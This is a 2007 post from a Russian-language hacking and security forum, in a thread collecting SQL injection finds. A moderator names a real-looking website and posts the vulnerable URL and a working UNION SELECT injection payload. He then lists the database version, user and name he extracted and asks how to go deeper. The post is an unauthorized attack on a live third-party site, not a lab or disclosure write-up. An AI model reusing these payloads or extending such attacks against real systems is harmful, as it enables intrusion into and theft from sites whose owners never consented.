ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 01.07.2007, 11:28
iv.
Moderator - Level 7
Регистрация: 21.03.2007
Сообщений: 1,200
Провел на форуме:
7134052

Репутация: 1204


По умолчанию
nvmu.ru

Подозрение на инъекцию:
Цитата:
http://nvmu.ru/cgi-bin/index.cgi?page=1'
Подбираем кол-во колонок:
Цитата:
http://nvmu.ru/cgi-bin/index.cgi?page=-1%20union%20select%201,2,3,4,5/*
Version: MySQL 5.1.19-beta
User: nvmu@localhost
Database: nvmu

Вывод только в заголовке, прав на mysql.user не хватает, возможно как-нибудь нормально инъектироваться?

PS. Спасибо товарищу из аськи за наводку и заодно, что разбудил меня. =\
 
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ